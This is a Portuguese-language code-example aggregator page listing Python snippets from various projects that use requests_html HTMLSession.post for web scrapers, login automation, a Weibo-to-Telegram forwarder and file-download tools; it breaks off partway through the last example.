Exemplos de HTMLSession.post em Python, exemplos de requests_html.HTMLSession.post em Python

Exemplo n.º 1

0

Exibir arquivo

Arquivo: stats.py Projeto: chenhang/chenhang.github.io

def get_hero_stats():
    hero_stats = []
    session = HTMLSession()
    res = session.post(hero_stats_url(), data={
                       'event[]': 86, 'teamcompTypes': 1})
    player_heros = []
    team_heros = []

    # ['gameNumber', 'roundtype', 'player', 'team', 'hero',
    # 'timePlayed', 'matchID', 'playerPic', 'playerName', 'teamPic',
    # 'nameCSFriendly', 'map', 'teamName']
    for result in res.html.search_all("heroStatsArr.concat({})"):
        player_heros += json.loads(result[0])

    # keys = ['gameNumber', 'roundtype', 'team', 'tcString',
    # 'gameWasPlayed', 'map', 'maptype', 'timePlayed', 'matchID']
    for result in res.html.search_all("teamcompsArr.concat({})"):
        team_heros += json.loads(result[0])
    write_json('stats/player_heros.json', player_heros)
    write_json('stats/team_heros.json', team_heros)

Exemplo n.º 2

0

Exibir arquivo

Arquivo: d2ldl.py Projeto: mosiman/d2ldl

r = session.get('https://learn.uwaterloo.ca/d2l/login?&noredirect=1')

user = input('WatIAm ID: ')
pw = getpass()

payload = {
    'nordirect': 1,
    'loginPath': '/d2l/login',
    'UserName': user,
    'Password': pw
}

# Log in via a session, values are sent in headers as required from here on.
r = session.post('https://learn.uwaterloo.ca/d2l/lp/auth/login/login.d2l',
                 data=payload,
                 allow_redirects=False)
# sessionVals = r.cookies.get_dict()

# Go to the home page
r = session.get('https://learn.uwaterloo.ca/d2l/home')
soup = BeautifulSoup(r.content, 'html.parser')

# find the term ID (is that what it is?)
# termID is needed to find the courses for this term.
# the 'calendar' URL just so happens to have this term ID
calendarURL = soup.find('a', href=lambda href: href and 'calendar' in href)
termID = calendarURL.get('href').split('/')[-1]

# Parse the courses data
courses = session.get(

Exemplo n.º 3

0

Exibir arquivo

 def make_request(self):
     session = HTMLSession()
     response = session.post(BaseRequest.BASE_URL, data=self.params())
     return response

Exemplo n.º 4

0

Exibir arquivo

class Weibo:

    def __init__(self):
        self.BASE_DIR = os.path.split(os.path.realpath(__file__))[0]
        config = configparser.ConfigParser()
        config.read(os.path.join(self.BASE_DIR, 'config.ini'), encoding='utf-8')
        self.WEIBO_ID = config.get("CONFIG", "WEIBO_ID")
        self.TELEGRAM_BOT_TOKEN = config.get("CONFIG", "TELEGRAM_BOT_TOKEN")
        self.TELEGRAM_CHAT_ID = config.get("CONFIG", "TELEGRAM_CHAT_ID")
        self.SESSION = HTMLSession()
        self.SESSION.adapters.DEFAULT_RETRIES = 5  # 增加重连次数
        self.SESSION.keep_alive = False  # 关闭多余连接
        proxy = config.get("CONFIG", "PROXY")
        self.PROXIES = {"http": proxy, "https": proxy}

    def send_telegram_message(self, text, weibo_link):
        """
        给电报发送文字消息
        """
        headers = {
            'Content-Type': 'application/json',
        }
        data = f'{{"chat_id":"{self.TELEGRAM_CHAT_ID}", "text":"{text}", "reply_markup": {{"inline_keyboard":' \
               f' [[{{"text":"🔗点击查看原微博", "url":"{weibo_link}"}}]]}}}} '
        url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendMessage'
        try:
            self.SESSION.post(url, headers=headers, data=data.encode('utf-8'), proxies=self.PROXIES)
        except:
            print('    |-网络代理错误，请检查确认后关闭本程序重试')
            time.sleep(99999)

    def send_telegram_photo(self, img_url):
        """
        给电报发送图片
        """
        url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendPhoto'
        data = dict(chat_id=f"{self.TELEGRAM_CHAT_ID}&", photo=img_url)

        self.SESSION.post(url, data=data, proxies=self.PROXIES)

    def parse_weibo(self, weibo):
        """
        检查当前微博是否已处理过，如果没处理过则发送博文以及配图到Telegram
        """
        conn = sqlite3.connect(os.path.join(self.BASE_DIR, 'db', 'weibo.db'))
        cursor = conn.cursor()

        sql = "SELECT COUNT(id) AS counts FROM weibo WHERE link = ?"
        cursor.execute(sql, (weibo['link'],))
        result = cursor.fetchone()

        if result[0] <= 0:
            self.send_telegram_message(
                '{}{}'.format(
                    f"[{len(weibo['pics'])}图] " if weibo['pics'] else '',
                    weibo['title'],
                ),
                weibo['link']
            )

            # 把图片url发送到Telegram中，可以第一时间在Telegram中收到推送
            for pic in weibo['pics']:
                self.send_telegram_photo(pic)

            # 配图发送到Telegram毕后，将配图独立保存到本地一份
            for pic in weibo['pics']:
                filename = pic[pic.rfind('/') + 1:]
                filename = os.path.join(self.BASE_DIR, 'images', filename)
                wget.download(pic, out=filename)

            sql = "INSERT INTO weibo(summary, link) VALUES(?, ?)"
            cursor.execute(sql, (
                weibo['title'],
                weibo['link'],
            ))
            conn.commit()
            conn.close()

            return True
        else:
            return False

    def test(self):
        print('* 正在检查微博ID是否配置正确')
        url = f'https://m.weibo.cn/api/container/getIndex?containerid=100505{self.WEIBO_ID}'
        try:
            weibo_name = self.SESSION.get(url).json()['data']['userInfo']['screen_name']
            print(f'【正确】当前设置的微博账户为：@{weibo_name}')
        except:
            print('【错误】请重新测试或检查微博数字ID是否正确')

        print('\n* 正在检查代理是否配置正确')
        try:
            status_code = self.SESSION.get('https://www.google.com',proxies=self.PROXIES, timeout=5).status_code
            if status_code == 200:
                print('【正确】代理配置正确，可正常访问')
            else:
                print('【错误】代理无法访问到电报服务器')
        except:
            print('【错误】代理无法访问到电报服务器')
        

    def run(self):
        print(time.strftime('%Y-%m-%d %H:%M:%S 执行完毕', time.localtime()))

        url = f'https://m.weibo.cn/api/container/getIndex?containerid=107603{self.WEIBO_ID}'

        try:
            weibo_items = self.SESSION.get(url).json()['data']['cards'][::-1]
        except:
            print('    |-访问url出错了')

        for item in weibo_items:
            weibo = {}

            weibo['title'] = BeautifulSoup(item['mblog']['text'].replace('<br />', '\n'), 'html.parser').get_text()

            if item['mblog'].get('weibo_position') == 3:  # 如果状态为3表示转发微博，附加上转发链，状态1为原创微博
                retweet = item['mblog']['retweeted_status']
                try:
                    weibo['title'] = f"{weibo['title']}//@{retweet['user']['screen_name']}:{retweet['raw_text']}"
                except:
                    weibo['title'] = f"{weibo['title']}//转发原文不可见，可能已被删除"

            try:
                weibo['pics'] = [pic['large']['url'] for pic in item['mblog']['pics']]
            except:
                weibo['pics'] = []

            short_url = item['scheme']
            short_url = short_url[short_url.rindex('/') + 1:short_url.index('?')]
            weibo['link'] = f'https://weibo.com/{self.WEIBO_ID}/{short_url}'

            self.parse_weibo(weibo)

Exemplo n.º 5

0

Exibir arquivo

Arquivo: requests-demo.py Projeto: joxon/hello-py-pub

from requests_html import HTMLSession

browser = HTMLSession()
data_login = {'account': '*****@*****.**', 'password': '******'}
url_login_api = 'https://api.mtdhb.org/user/login'
r = browser.post(url_login_api, data=data_login)
print(r.json()['code'])

Exemplo n.º 6

0

Exibir arquivo

class F5Downloads:
    def __init__(self, username, password, default_location='IRELAND'):
        self.username = username
        self.password = password
        self.default_location = default_location
        self._session = None
        self._version_pages = None
        self.new_files = []

    @property
    def session(self):
        if not self._session:
            self._session = HTMLSession()
            self._session.post(
                'https://api-u.f5.com/auth/pub/sso/login/user',
                headers={'Content-Type': 'application/x-www-form-urlencoded'},
                data={
                    'userid': self.username,
                    'passwd': self.password,
                })
        return self._session

    def find_links(self, page, pattern):
        return [(l.text, next(iter(l.absolute_links)))
                for l in page.html.find('a')
                if l.text and l.absolute_links and re.match(pattern, l.text)]

    def follow_specific_link(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']

        matching_links = self.find_links(page, pattern)

        # To proceed in the chain we need exactly one match
        if len(matching_links) != 1:
            logger.error(
                'Found {len(matching_links)} matches for url {url} and pattern {pattern}, unable to proceed'
            )
            logger.error('Files found:')
            logger.error(matching_links)
            raise Exception(f'')

        name, url = matching_links[0]
        logger.debug(f'Following {name} with {url}')
        return self.get_page(url)

    def pick_latest_version(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']

        matching_links = self.find_links(page, pattern)

        if not len(matching_links):
            raise Exception(
                f'No versions matching {pattern} found on page {page}')

        versionDict = {}

        # This is an ugly one. Threat the versions as a decimal number and increase the worth
        # of each version number by a factor of 10, then return the sum
        for version, url in matching_links:
            number = version.replace('.', '')
            versionDict[number] = (version, url)

        # Pick the highest number
        version, url = versionDict[max(versionDict, key=int)]
        logger.debug(f'Picking {version} as latest version')

        return self.get_page(url)

    def follow_path(self, page, steps):

        step = steps.pop(0)
        f = step['f']
        args = step['args']
        args['page'] = page

        result = f(**args)

        if not len(steps):
            return result
        elif result:
            return self.follow_path(result, steps)

    # Detect if the EULA exists and circle around it
    def get_page(self, url):
        page = self.session.get(url)
        if len(page.html.find('input#accept-eula')):
            logger.debug('EULA encountered, accepting it')
            page = self.session.get(
                url.replace('https://downloads.f5.com/esd/ecc.sv',
                            'https://downloads.f5.com/esd/eula.sv'))
        return page

    def download_files(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']
        download_folder = kwargs['download_folder']
        cb = kwargs['cb']

        # Create folders if needed
        pathlib.Path(download_folder).mkdir(parents=True, exist_ok=True)

        matching_links = self.find_links(page, pattern)

        for name, url in matching_links:
            md5_name, md5_url = next(
                iter(self.find_links(page, rf'^{name}.md5$')), (None, None))

            # Only download if there's a matching md5 file
            if not md5_name:
                raise Exception(f'No matching md5 file found for {name}')

            file_path = f'{download_folder}{name}'
            md5_path = f'{download_folder}{md5_name}'
            self.download_file(md5_path, md5_url)

            if self.md5_sum_ok(md5_path, file_path):
                logger.info('The newest file already exists on disk')
                return file_path
            else:
                self.download_file(file_path, url)
                logger.info(f'Validating {name} against the supplied    md5')
                if self.md5_sum_ok(md5_path, f'{download_folder}{name}'):
                    logger.info('Downloaded file successfully')
                    if cb:
                        cb(file_path)
                    return (file_path)
                else:
                    raise Exception(f'Failed to download file {name}')

    def md5_sum_ok(self, md5_file, file):
        if not os.path.exists(md5_file):
            raise Exception(f'{md5_file} does not exist')
        if not os.path.exists(file):
            logger.info(f'{file} does not exist')
            return False
        with open(md5_file, 'r') as f:
            md5sum = re.sub(r' .+\n$', '', f.read())
        file_sum = self.md5(file)

        return md5sum == file_sum

    def md5(self, file_name):
        hash_md5 = hashlib.md5()
        with open(file_name, "rb") as f:
            for chunk in iter(lambda: f.read(4096), b""):
                hash_md5.update(chunk)
        return hash_md5.hexdigest()

    def download_file(self, file_path, url):
        if os.path.exists(file_path):
            os.remove(file_path)
        page = self.get_page(url)
        name, download_url = next(
            iter(self.find_links(page, rf'{self.default_location}')),
            (None, None))
        if (download_url):
            logger.debug(f'Saving file as ./{file_path}')
            with self.session.get(download_url, stream=True) as r:
                r.raise_for_status()
                with open(file_path, 'wb') as f:
                    for chunk in r.iter_content(chunk_size=8192):
                        f.write(chunk)

    def download_geoipdb(self, version, cb=None):
        return self.follow_path(
            self.get_page('https://downloads.f5.com/esd/productlines.jsp'),
            [{
                'f': self.follow_specific_link,
                'args': {
                    'pattern': rf'BIG-IP v{version}.x.+'
                },
            }, {
                'f': self.follow_specific_link,
                'args': {
                    'pattern': r'GeoLocationUpdates',
                }
            }, {
                'f': self.download_files,
                'args': {
                    'pattern': rf'^ip-geolocation-.+\.zip$',
                    'download_folder': f'./downloads/GeoIP/v{version}/',
                    'cb': cb
                }
            }])

    def download_latest_version(self, version, cb=None):
        return self.follow_path(
            self.get_page('https://downloads.f5.com/esd/productlines.jsp'),
            [{
                'f': self.follow_specific_link,
                'args': {
                    'pattern': rf'BIG-IP v{version}.x.+'
                },
            }, {
                'f': self.pick_latest_version,
                'args': {
                    'pattern': rf'^{version}[\.0-9]+$',
                }
            }, {
                'f': self.download_files,
                'args': {
                    'pattern': rf'^BIGIP-{version}[\.0-9]+.+iso$',
                    'download_folder': f'./downloads/BIG-IP/v{version}/',
                    'cb': cb
                }
            }])

Exemplo n.º 7

0

Exibir arquivo

class ActivityHelper():
    def __init__(self, id):
        super().__init__()
        self.id = id
        self.session = HTMLSession()

    def get_chptcha(self):
        # get captcha code
        ocr = CaptchaOCR(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/CodeController/kaptcha')
        return ocr.parse(), ocr.get_image_response()

    def login(self):
        code, response = self.get_chptcha()
        self.cookie = response.cookies['SESSION']
        print('Cookie: %s' % self.cookie)

        data = {'verifyCode': code, 'cust_id': self.id, 'eventId': ''}
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie
        }

        r = self.session.post(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/checkVerifyCode',
            data=data,
            headers=headers)

        result = r.html.html
        if result == 'notPassCode' or result == 'overLimit' or result == 'noPass' or result == 'errorFormat':
            print("Error: ", result)

    def find_all(self):
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie
        }
        r = self.session.get(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select',
            headers=headers)
        activities = r.html.find(
            '.form-item:not(.form-item-selected) input:checkbox[name="event-select"]'
        )
        datas = []

        for item in activities:
            event_values = item.attrs['value'].split('_')
            datas.append({
                'eventId':
                event_values[0],
                'installmentEvent':
                event_values[1],
                'regEndDate':
                datetime.strptime(event_values[2],
                                  '%a %b %d %H:%M:%S %Z %Y').strftime(
                                      '%Y-%m-%dT%H:%M:%S.000+08:00').__str__()
            })
            print('Selected: %s' % datas)
            break
        return datas

    def select_all(self):
        datas = self.find_all()
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer':
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select',
            'Content-Type': 'application/json; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie,
            'Accept': 'text/plain, */*; q=0.01'
        }

        r = self.session.post(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/save',
            data=json.dumps(datas),
            headers=headers)

        print('Result: %s' % (int(r.text) == len(datas)))

    def execute(self):
        self.login()
        self.select_all()

Exemplo n.º 8

0

Exibir arquivo

class ArrivaScraper:
    def __init__(self):
        self.url = "https://www.arriva.com.hr/en-us/choose-your-journey"
        self.session = HTMLSession()
        self.data = {
            "post-type": "shop",
            "currentstepnumber": "1",
            "search-from": None,
            "search-to": None,
            "search-datetime": None,
            "ticket-type": "oneway",
        }
        self.html = None
        self.cacher = CacheController()

    def run(self, source, destination, date):
        search = [source, destination, date]
        self.data["search-from"] = search[0]
        self.data["search-to"] = search[1]
        self.data["search-datetime"] = search[2]

        cached_data = self.cacher.getJourneys(search)

        if cached_data:
            return cached_data

        self.html = self.session.post(self.url, self.data).html

        return self.parseData(search)

    def parseData(self, search):
        dep = self.fetchDepartures()
        arr = self.fetchArrivals()
        dur = self.fetchDurations()
        pr = self.fetchPrices()
        carr = self.fetchCarriers()

        journeys = [
            Journey(
                source=search[0],
                destination=search[1],
                date=search[2],
                departure=dep[i] + " h",
                arrival=arr[i] + " h",
                duration=dur[i] + " h",
                price=pr[i],
                carrier=carr[i],
            ) for i in range(len(dep))
        ]

        return self.cacher.cacheJourneys(journeys, search)

    def fetchDepartures(self):
        return [
            dep.find("strong")[0].text.split("-")[0][:-1]
            for dep in self.html.find(".vrijeme-top")
        ]

    def fetchArrivals(self):
        return [
            arr.find("strong")[0].text.split("-")[1][1:]
            for arr in self.html.find(".vrijeme-top")
        ]

    def fetchPrices(self):
        prices = [
            pr.find("a")[0].text.split(",")[0]
            for pr in self.html.find(".cijena") if pr.find("a") != []
        ]
        return [round(c.convert(int(ep), "HRK"), 2) for ep in prices]

    def fetchDurations(self):
        return [dur.text[16:] for dur in self.html.find(".vrijeme-bottom")]

    def fetchCarriers(self):
        return [carr.text[9:] for carr in self.html.find(".prijevoznik")]

Exemplo n.º 9

0

Exibir arquivo

Arquivo: login.py Projeto: bnpysse/people

from requests_html import HTMLSession

login_url1 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO'

login_url2 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO?execution=e1s1'

data = {'j_username': '******', 'j_password': '******'}

s = HTMLSession()

r = s.post(login_url1, data=data)

r.html.render()

r = s.post(login_url2, data=data)

print(r.status_code)

for i in r.cookies:
    print(i)

Exemplo n.º 10

0

Exibir arquivo

Arquivo: SSRP_CQVIPspider.py Projeto: Hitchcock717/SSRP-Dev

class CqvipSpider(object):

    def __init__(self):
        self.base_url = 'http://qikan.cqvip.com/Qikan/Search/Index?'
        self.main_url = 'http://qikan.cqvip.com'
        self.test_url = 'http://qikan.cqvip.com/Search/SearchList'
        self.session = HTMLSession()

        com = CommonSettings()
        self.headers = com.set_common_headers()
        # self.keyword = com.set_common_keyword()
        self.pagesize = com.set_common_pagesize()
        self.csvname = com.set_common_output()[1]

    @retry()
    def post(self, url, data):
        result = self.session.post(url, data=data, timeout=10)
        result.encoding = result.apparent_encoding
        return result

    def get_init_page(self, search_word):
        data = {
            'key': 'U=' + search_word,
            'isNoteHistory': '1',
            'isLog': '1',
            'indexKey': search_word,
            'indexIdentifier': 'U'
        }
        attempts = 0
        success = False
        while attempts < 100 and not success:
            try:

                result = self.post(self.base_url, data)

                print('status of init page is %s' % result)
                if result.status_code != 200:
                    attempts += 1
                    print('status.error')
                    print('第' + str(attempts) + '次重试！！')
                    if attempts == 100:
                        break
                else:
                    bsoj = BeautifulSoup(result.text, features='lxml')
                    # print(bsoj)
                    total_count = bsoj.find('input', {'id': 'hidShowTotalCount'})['value']
                    page_count = math.ceil(int(total_count)/self.pagesize)
                    print('总页数为%s页' % page_count)

                    socket.setdefaulttimeout(10)  # 设置10秒后连接超时
                    success = True
                    return total_count, page_count

            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('init page callback: %s' % e)
                print('第' + str(attempts) + '次重试！！')
                if attempts == 100:
                    break

    def get_qikan_page(self, search_word):
        containers = []
        null = None  # python中的None vs js中的Null
        total_count = self.get_init_page(search_word)[0]
        page_count = self.get_init_page(search_word)[1]
        breakpoint = 1
        attempts = 0
        success = False
        while attempts < 100 and not success:
            try:
                while breakpoint <= page_count:
                    container = []
                    print('正在爬取第%s页...' % breakpoint)
                    searchParamModel = json.dumps({"ObjectType": 1, "SearchKeyList":[],"SearchExpression": null,"BeginYear": null,"EndYear": null,"UpdateTimeType": null,"JournalRange": null,"DomainRange": null,"ClusterFilter": "","ClusterLimit": 0,"ClusterUseType": "Article","UrlParam": "U=" + self.keyword,"Sort": "0","SortField": null,"UserID": "0","PageNum": breakpoint,"PageSize": self.pagesize,"SType": null,"StrIds": null,"IsRefOrBy": 0,"ShowRules": "  任意字段=" + self.keyword + "  ","IsNoteHistory": 0,"AdvShowTitle": null,"ObjectId": null,"ObjectSearchType": 0,"ChineseEnglishExtend": 0,"SynonymExtend": 0,"ShowTotalCount": int(total_count),"AdvTabGuid":""})
                    # print(searchParamModel)
                    data = {
                        'searchParamModel': searchParamModel
                    }

                    result = self.post(self.test_url, data)
                    print('status of qikan page is %s' % result)

                    if result.status_code != 200:
                        attempts += 1
                        print('qikan.status.error')
                        print('第' + str(attempts) + '次重试！！')
                        if attempts == 100:
                            break
                    else:
                        soup = BeautifulSoup(result.text, features='lxml')
                        # print(soup)
                        simple_div = soup.find('div', {'class': 'simple-list'})
                        # print(simple_div)
                        dls = simple_div.findAll('dl')
                        for dl in dls:
                            field = {}
                            dt = dl.find('dt')
                            if dt.find('span', {'class': 'cited'}):
                                cited_span = dt.find('span', {'class': 'cited'})
                                cited = cited_span.find('a')['data-zkbycount']
                                field['cited'] = cited
                            else:
                                cited = '0'
                                field['cited'] = cited

                            download = self.main_url + dt.find('a')['href']
                            field['download'] = download

                            container.append(field)

                    containers.extend(container)
                    print('第%s页爬取结束!' % breakpoint)
                    breakpoint += 1
                    if breakpoint > page_count:
                        print('已爬取结束, 共%s页' % (breakpoint-1))
                    else:
                        print('新断点记录为第%s页' % breakpoint)

                socket.setdefaulttimeout(10)  # 设置10秒后连接超时
                success = True
                return containers

            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('qikan page callback: %s' % e)
                print('第' + str(attempts) + '次重试！！')
                if attempts == 100:
                    break

    def get_detail_page(self, search_word):
        breakpoint = 0
        attempts = 0
        repos = []
        success = False
        containers = self.get_qikan_page(search_word)
        while attempts < 100 and not success:
            try:
                while breakpoint < len(containers):
                    repo = {}
                    cited = containers[breakpoint]['cited']
                    repo['cited'] = cited
                    download = containers[breakpoint]['download']
                    repo['download'] = download
                    print('正在爬取链接为:%s' % download)

                    abuyun = AbuyunProxy()
                    proxy_handler = abuyun.urllib_proxy_settings()[1]
                    opener = urllib.request.build_opener(proxy_handler)
                    urllib.request.install_opener(opener)

                    request = urllib.request.Request(download, headers=self.headers)
                    print('status of detail page is %s' % request)
                    html = urllib.request.urlopen(request, timeout=10).read()
                    soup = BeautifulSoup(html, 'lxml')
                    # print('detail page is parsed as \n%s' % soup)

                    if soup.find('div', {'class': 'article-title'}):
                        title_div = soup.find('div', {'class': 'article-title'})
                        raw_title = title_div.find('h1').get_text()
                        raw_title1 = re.sub('预览', '', raw_title).strip().replace('\r', '').replace('\n', '')
                        title = re.sub('被引量.*', '', raw_title1).strip()
                        print(title)
                        repo['title'] = title
                    else:
                        title = 'N/A'
                        repo['title'] = title

                    article_div = soup.find('div', {'class': 'article-detail'})
                    abstract_div = article_div.find('div', {'class': 'abstract'})

                    if abstract_div.find('span', {'class': 'abstract'}):
                        abstract = abstract_div.find('span', {'class': 'abstract'}).get_text().replace('\r', '').replace('\n', '').strip('\'').replace(',', '，')
                        print(abstract)
                        repo['abstract'] = abstract
                    else:
                        abstract = 'N/A'
                        repo['abstract'] = abstract

                    author_div = article_div.find('div', {'class': 'author'})
                    if author_div.find('span'):
                        raw_author = author_div.findAll('span')[1].get_text().replace('\n', ';')
                        raw_author1 = re.sub('^;|;$', '', raw_author)
                        author = raw_author1.replace(';', ' ')
                        print(author)
                        repo['author'] = author
                    else:
                        author = 'N/A'
                        repo['author'] = author

                    if article_div.find('div', {'class': 'organ'}):
                        info_div = article_div.find('div', {'class': 'organ'})
                        if info_div.find('span'):
                            raw_info = info_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', ';')
                            info = re.sub('^;|;$', '', raw_info)
                            print(info)
                            repo['info'] = info
                        else:
                            info = 'N/A'
                            repo['info'] = info
                    else:
                        info = 'N/A'
                        repo['info'] = info

                    if article_div.find('div', {'class': 'journal'}):
                        date_div = article_div.find('div', {'class': 'journal'})
                        if date_div.find('span', {'class': 'vol'}):
                            raw_date = date_div.find('span', {'class': 'vol'}).get_text().strip('\n').strip('\'').strip('').strip()
                            date = re.search('^.*年', raw_date).group()
                            print(date)
                            repo['date'] = date
                        else:
                            date = 'N/A'
                            repo['date'] = date
                    else:
                        date = 'N/A'
                        repo['date'] = date

                    source = '维普期刊'
                    repo['source'] = source

                    downed = '暂无'
                    repo['downed'] = downed

                    if article_div.find('div', {'class': 'fund'}):
                        fund_div = article_div.find('div', {'class': 'fund'})
                        funds = []
                        if fund_div.find('span'):
                            if len(fund_div.findAll('span')) > 2:
                                fund_span = fund_div.findAll('span')[1:]
                                for span in fund_span:
                                    fund_piece = span.get_text().replace('\r', '').replace('\n', '').strip()
                                    funds.append(fund_piece)
                                fund = ';'.join(funds)
                                print(fund)
                                repo['fund'] = fund
                            else:
                                fund = fund_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', '').strip().replace(',', '，')
                                repo['fund'] = fund
                        else:
                            fund = 'N/A'
                            repo['fund'] = fund
                    else:
                        fund = 'N/A'
                        repo['fund'] = fund

                    if article_div.find('div', {'class': 'subject'}):
                        kws_div = article_div.find('div', {'class': 'subject'})
                        kwss = []
                        if kws_div.find('span'):
                            if len(kws_div.findAll('span')) > 2:
                                kws_span = kws_div.findAll('span')[1:]
                                for span in kws_span:
                                    kws_piece = span.get_text()
                                    kwss.append(kws_piece)
                                kws = ';'.join(kwss)
                                repo['kws'] = kws
                            else:
                                kws = kws_div.findAll('span')[1].get_text()
                                repo['kws'] = kws
                        else:
                            kws = 'N/A'
                            repo['kws'] = kws
                    else:
                        kws = 'N/A'
                        repo['kws'] = kws
                    repos.append(repo)
                    print('第%s篇论文爬取结束!' % breakpoint)
                    breakpoint += 1
                    if breakpoint == len(containers):
                        print('已爬取结束, 共%s页' % (breakpoint-1))
                    else:
                        print('新断点记录为第%s页' % breakpoint)

                socket.setdefaulttimeout(10)  # 设置10秒后连接超时
                success = True
                print(repos)
                return repos

            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('detail page callback: %s' % e)
                print('第' + str(attempts) + '次重试！！')
                if attempts == 100:
                    break

    def save_data(self, search_word):
        try:
            csv_data = self.get_detail_page(search_word)
            sheet = pyexcel.Sheet()
            for data in csv_data:
                sheet.row += pyexcel.get_sheet(adict=data, transpose_after=True)
            sheet.colnames = ['title', 'author', 'source', 'info', 'date', 'kws', 'cited', 'downed', 'abstract', 'fund', 'download']
            print(sheet)
            sheet.save_as(self.csvname)

        except Exception as e:
            print('404 error!%s' % e)

    def pandas_save_data(self, search_word):
        try:
            csv_data = self.get_detail_page(search_word)
            dataframe = pd.DataFrame(csv_data)
            print(dataframe)
            dataframe.to_csv(self.csvname, index=False, sep=',', encoding='utf-8')
            print('data saved')

        except Exception as e:
            print('404 error!%s' % e)

Exemplo n.º 11

0

Exibir arquivo

Arquivo: main.py Projeto: hoang010/CrisisManagementSystem

from requests_html import HTMLSession

from Constants import *

session = HTMLSession()

session.post(loginUrl, loginInfo)


def get_verification_token(r):
    verification_token = r.html.find('input', first=True).attrs['value']
    return verification_token


def create_crises():
    r = session.get(createCrisesUrl)
    verification_token = get_verification_token(r)
    payload = create_crises_info(verification_token)
    return_action(CREATE, payload, createCrisesUrl)


def return_action(action, payload, url):
    session.post(url, data=payload, headers=headers)


def get_crises(properties):
    r = session.get(crisesListUrl)
    links = [x for x in r.html.absolute_links if properties in x]
    return links

Exemplo n.º 12

0

Exibir arquivo

class AnchorInfo(object):
    def __init__(self, env):
        self.url = 'http://www.darenji.com/search.html'
        self.headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
            'Referer': 'http://www.darenji.com/search.html',
        }
        self.env_dict = environments.get(env)
        self.r = redis.StrictRedis().from_url(
            url=self.env_dict.get('redis_url'))
        self.clent = MongoClient(self.env_dict.get('mongodb_host'),
                                 port=self.env_dict.get('mongodb_port'))
        self.db = self.clent['pltaobao']
        self.session = HTMLSession()

    def save_data(self, id, nickname, fansCount, anchorPhoto, houseId,
                  descText):
        self.r.sadd('anchorId', str(id))
        self.r.sadd('anchorName', nickname)
        collection = self.db['anchor_info']
        res = collection.find_one({'anchorId': str(id)})
        if not res:
            data = {
                'anchorId': str(id),
                'anchorName': nickname,
                'houseId': int(houseId),
                'fansCount': int(fansCount),
                'liveCount': None,
                'city': None,
                'creatorType': None,
                'darenScore': None,
                'descText': descText,
                'anchorPhoto': anchorPhoto,
                'organId': None,
                'fansFeature': None,
                'historyData': None,
            }
            collection.insert_one(data)

    def get_data(self, anchor_name):

        try:
            rs = self.session.post(url=self.url,
                                   headers=self.headers,
                                   data={'conditions': anchor_name},
                                   timeout=3)
        except:
            return None

        find_count = rs.html.xpath('//*[@id="qcount"]/text()')[0]

        if find_count == '0':
            return None

        nick_list = rs.html.xpath('//*[@id="nickname"]/text()')
        anchorPhoto_list = rs.html.xpath('//*[@id="paginate"]/li/div/a/@style')
        fans_num = rs.html.xpath(
            '//*[@id="paginate"]/li/div/div[1]/h1/span/text()')
        house_id = rs.html.xpath(
            '//*[@id="paginate"]/li/div/div[1]/p/span/text()')
        desc_text = rs.html.xpath(
            '//*[@id="paginate"]/li/div/div[2]/div[1]/p/text()')

        for index, nick in enumerate(nick_list):
            id = anchorPhoto_list[index].split('/')[5]
            nickname = nick_list[index].replace(' ', '').replace("\n", "")
            fansCount = fans_num[index].replace(' 粉丝数量：', '')
            anchorPhoto = anchorPhoto_list[index].replace(
                'background:url(', 'https:').replace(') no-repeat;', '')
            houseId = house_id[index]
            descText = desc_text[index].strip().replace("\n", "")
            print(id, nickname)
            if nickname == anchor_name:
                anchorId = id
                self.save_data(id, nickname, fansCount, anchorPhoto, houseId,
                               descText)
                break
            else:
                anchorId = None
                # self.save_data(id, nickname, fansCount, anchorPhoto, houseId, descText)

        print(anchorId)
        return anchorId

Exemplo n.º 13

0

Exibir arquivo

Arquivo: allbids.py Projeto: l327253678/koala

class Bidding:
    def __init__(self, url, page):
        self.url = url
        self.loginurl = self.url + '/cblcn/member.login/login'
        self.yzmurl = self.url + '/cblcn/member.login/captcha'
        self.loginchkurl = self.url + '/cblcn/member.login/logincheck'
        self.page = page
        self.key_title1 = '风电'
        self.key_title2 = '风力'
        self.key_content = '风力发电机组'
        self.exp_list = [
            '询价', '施工', '维修', '维护', '运维', '改造', '接地', '海缆',
            '改建', '中标', '塔筒', '塔架', '基础', '法兰', '锚栓', '压站',
            '主轴', '主变', '箱变', '勘察', '设计', '滤芯', '螺栓', '电气',
            '线路', '道路', '监理', '备件', '吊装', '可研', '润滑', '配电',
            '装置', '检测', '检修', '监测', '监督', '测试', '测评', '试验',
            '变更', '更换', '技改', '验收', '安装', '分包', '电缆', '光缆',
            '材料', '箱式', '框架', '造价', '通信', '编码', '定检', '叶片',
            '倒运', '消防', '开关', '主体', '集控', '诊断', '齿轮', '柴油',
            '部件', '电池', '风扇', '充电', '故障', '消缺', '外委', '水土',
